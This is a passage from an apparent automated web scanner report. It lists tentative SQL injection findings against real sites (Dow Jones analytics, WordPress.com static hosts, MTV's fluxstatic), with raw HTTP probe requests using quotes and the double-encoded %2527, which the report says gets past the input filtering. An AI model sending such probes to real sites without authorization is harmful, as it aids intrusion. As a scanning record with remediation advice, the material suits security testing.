GET /b%2527/ss/djglobal,djwsj/1/H.20.3/s22808814137242?AQB=1&ndh=1&t=13/5/2011%2019%3A14%3A10%201%20300&vmt=44BD02B1&ns=dowjones&pageName=WSJ_Technology_SB10001424052702304665904576383880754844512&g=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&r=http%3A//online.wsj.com/public/page/news-tech-technology.html%3Frefresh%3Don&cc=USD&ch=Online%20Journal&server=online.wsj.com&v0=WSJ_Tech_LEADTop&events=event12%2Cevent18&c1=Article&c2=WSJ_Tech&c3=WSJ_Article_Technology&c4=WSJ_article_Technology_Banner%20Ads%20and%20Other%20%27Local%27%20Flops&v4=WSJ_Technology_SB10001424052702304665904576383880754844512&c5=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html&v5=WSJ_Tech_LEADTop&c6=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&c7=off&c8=WSJ%20Online%20Article&c9=preview&c10=WSJ_Tech_LEADTop&v11=Online%20Journal&c13=tech_main_story&c19=article_preview&c20=SB10001424052702304665904576383880754844512&c21=WSJ_Stu%20Woo%2C%20Geoffrey%20A.%20Fowler&c22=WSJ_Article_Tech&c24=Edition_North_America_USA&v25=WSJ_Tech&c26=WSJ_Tech&c27=WSJ_free&v29=WSJ_Tech&v31=Monday&v32=19%3A00&v37=WSJ_Article_Technology&c49=1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=WSJ_Tech_0_0_WP_2200&pidt=1&oid=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&ot=A&AQE=1 HTTP/1.1
Host: om.dowjoneson.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72A64051D1F1F-4000010980086687[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 14 Jun 2011 00:26:36 GMT
Server: Omniture DC/2.0.0
Content-Length: 442
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/djglobal,djwsj/1/H.20.3/s22808814137242 was
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/djglobal,djwsj/1/H.20.3/s22808814137242?AQB=1&ndh=1&t=13/5/2011%2019%3A14%3A10%201%20300&vmt=44BD02B1&ns=dowjones&pageName=WSJ_Technology_SB10001424052702304665904576383880754844512&g=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&r=http%3A//online.wsj.com/public/page/news-tech-technology.html%3Frefresh%3Don&cc=USD&ch=Online%20Journal&server=online.wsj.com&v0=WSJ_Tech_LEADTop&events=event12%2Cevent18&c1=Article&c2=WSJ_Tech&c3=WSJ_Article_Technology&c4=WSJ_article_Technology_Banner%20Ads%20and%20Other%20%27Local%27%20Flops&v4=WSJ_Technology_SB10001424052702304665904576383880754844512&c5=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html&v5=WSJ_Tech_LEADTop&c6=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&c7=off&c8=WSJ%20Online%20Article&c9=preview&c10=WSJ_Tech_LEADTop&v11=Online%20Journal&c13=tech_main_story&c19=article_preview&c20=SB10001424052702304665904576383880754844512&c21=WSJ_Stu%20Woo%2C%20Geoffrey%20A.%20Fowler&c22=WSJ_Article_Tech&c24=Edition_North_America_USA&v25=WSJ_Tech&c26=WSJ_Tech&c27=WSJ_free&v29=WSJ_Tech&v31=Monday&v32=19%3A00&v37=WSJ_Article_Technology&c49=1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=WSJ_Tech_0_0_WP_2200&pidt=1&oid=http%3A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&ot=A&AQE=1 HTTP/1.1
Host: om.dowjoneson.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72A64051D1F1F-4000010980086687[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 14 Jun 2011 00:26:36 GMT
Server: Omniture DC/2.0.0
xserver: www438
Content-Length: 0
Content-Type: text/html

1.5. http://s0.wp.com/wp-content/themes/h4/i/ajax-loader.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://s0.wp.com
Path:   /wp-content/themes/h4/i/ajax-loader.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /wp-content/themes/h4/i'/ajax-loader.gif?m=1274328069g HTTP/1.1
Host: s0.wp.com
Proxy-Connection: keep-alive
Referer: http://wordpress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 14 Jun 2011 00:32:17 GMT
Server: nginx
Content-Length: 564

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
...[SNIP]...

Request 2

GET /wp-content/themes/h4/i''/ajax-loader.gif?m=1274328069g HTTP/1.1
Host: s0.wp.com
Proxy-Connection: keep-alive
Referer: http://wordpress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 14 Jun 2011 00:32:18 GMT
Server: nginx
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
1.6. http://s0.wp.com/wp-content/themes/h4/i/header-bg.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://s0.wp.com
Path:   /wp-content/themes/h4/i/header-bg.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /wp-content/themes'/h4/i/header-bg.png?2 HTTP/1.1
Host: s0.wp.com
Proxy-Connection: keep-alive
Referer: http://wordpress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 14 Jun 2011 00:31:56 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 564

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
...[SNIP]...

Request 2

GET /wp-content/themes''/h4/i/header-bg.png?2 HTTP/1.1
Host: s0.wp.com
Proxy-Connection: keep-alive
Referer: http://wordpress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 14 Jun 2011 00:31:57 GMT
Server: nginx
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
1.7. http://s1.wp.com/wp-includes/js/swfobject.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://s1.wp.com
Path:   /wp-includes/js/swfobject.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /wp-includes/js%2527/swfobject.js?m=1306159264g&ver=2.2 HTTP/1.1
Host: s1.wp.com
Proxy-Connection: keep-alive
Referer: http://videopress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 14 Jun 2011 00:32:31 GMT
Server: nginx
Content-Length: 564

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
...[SNIP]...

Request 2

GET /wp-includes/js%2527%2527/swfobject.js?m=1306159264g&ver=2.2 HTTP/1.1
Host: s1.wp.com
Proxy-Connection: keep-alive
Referer: http://videopress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 14 Jun 2011 00:32:32 GMT
Server: nginx
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
1.8. http://static0.fluxstatic.com/-/Clients/Common/JS/Controls/ButtonControl.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://static0.fluxstatic.com
Path:   /-/Clients/Common/JS/Controls/ButtonControl.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /-'/Clients/Common/JS/Controls/ButtonControl.js?7622b7ab HTTP/1.1
Host: static0.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s01s
Cache-Control: max-age=2600000
Date: Tue, 14 Jun 2011 00:28:14 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /-''/Clients/Common/JS/Controls/ButtonControl.js?7622b7ab HTTP/1.1
Host: static0.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Length: 35
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2599976
Date: Tue, 14 Jun 2011 00:28:15 GMT
Connection: close
Vary: Accept-Encoding

404 - File or directory not found
1.9. http://static1.fluxstatic.com/-/Clients/Common/JS/Controls/OverlayPanel.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://static1.fluxstatic.com
Path:   /-/Clients/Common/JS/Controls/OverlayPanel.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /-/Clients/Common/JS/Controls'/OverlayPanel.js?7636d0b0 HTTP/1.1
Host: static1.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s01s
Cache-Control: max-age=2600000
Date: Tue, 14 Jun 2011 00:28:07 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /-/Clients/Common/JS/Controls''/OverlayPanel.js?7636d0b0 HTTP/1.1
Host: static1.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Length: 35
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2600000
Date: Tue, 14 Jun 2011 00:28:07 GMT
Connection: close
Vary: Accept-Encoding

404 - File or directory not found
1.10. http://static2.fluxstatic.com/-/Clients/Common/JS/Common/AjaxBaseControl.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://static2.fluxstatic.com
Path:   /-/Clients/Common/JS/Common/AjaxBaseControl.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /-/Clients'/Common/JS/Common/AjaxBaseControl.js?772b0733 HTTP/1.1
Host: static2.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s01s
Cache-Control: max-age=2599954
Date: Tue, 14 Jun 2011 00:28:31 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /-/Clients''/Common/JS/Common/AjaxBaseControl.js?772b0733 HTTP/1.1
Host: static2.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Length: 35
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2599997
Date: Tue, 14 Jun 2011 00:28:31 GMT
Connection: close
Vary: Accept-Encoding

404 - File or directory not found
1.11. http://static3.fluxstatic.com/-/Clients/Common/JS/Common/AjaxBasePage.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://static3.fluxstatic.com
Path:   /-/Clients/Common/JS/Common/AjaxBasePage.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /-'/Clients/Common/JS/Common/AjaxBasePage.js?772999d2 HTTP/1.1
Host: static3.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s01s
Cache-Control: max-age=2599991
Date: Tue, 14 Jun 2011 00:28:26 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /-''/Clients/Common/JS/Common/AjaxBasePage.js?772999d2 HTTP/1.1
Host: static3.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Length: 35
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2599975
Date: Tue, 14 Jun 2011 00:28:27 GMT
Connection: close
Vary: Accept-Encoding

404 - File or directory not found
1.12. http://static3.fluxstatic.com/-/Clients/Common/JS/Controls/PrefilledTextBox.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://static3.fluxstatic.com
Path:   /-/Clients/Common/JS/Controls/PrefilledTextBox.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /-/Clients/Common%2527/JS/Controls/PrefilledTextBox.js?761f2727 HTTP/1.1
Host: static3.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s01s
Cache-Control: max-age=2599975
Date: Tue, 14 Jun 2011 00:28:24 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /-/Clients/Common%2527%2527/JS/Controls/PrefilledTextBox.js?761f2727 HTTP/1.1
Host: static3.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Length: 35
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2600000
Date: Tue, 14 Jun 2011 00:28:24 GMT
Connection: close
Vary: Accept-Encoding

404 - File or directory not found
1.13. http://static3.fluxstatic.com/-/Clients/Common/JS/Controls/PrefilledTextBox.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://static3.fluxstatic.com
Path:   /-/Clients/Common/JS/Controls/PrefilledTextBox.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /-/Clients/Common/JS/Controls'/PrefilledTextBox.js?761f2727 HTTP/1.1
Host: static3.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s01s
Cache-Control: max-age=2599971
Date: Tue, 14 Jun 2011 00:28:28 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /-/Clients/Common/JS/Controls''/PrefilledTextBox.js?761f2727 HTTP/1.1
Host: static3.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Length: 35
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2599970
Date: Tue, 14 Jun 2011 00:28:28 GMT
Connection: close
Vary: Accept-Encoding

404 - File or directory not found
2. HTTP header injection  previous  next
There are 15 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

2.1. http://ad.doubleclick.net/activity [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

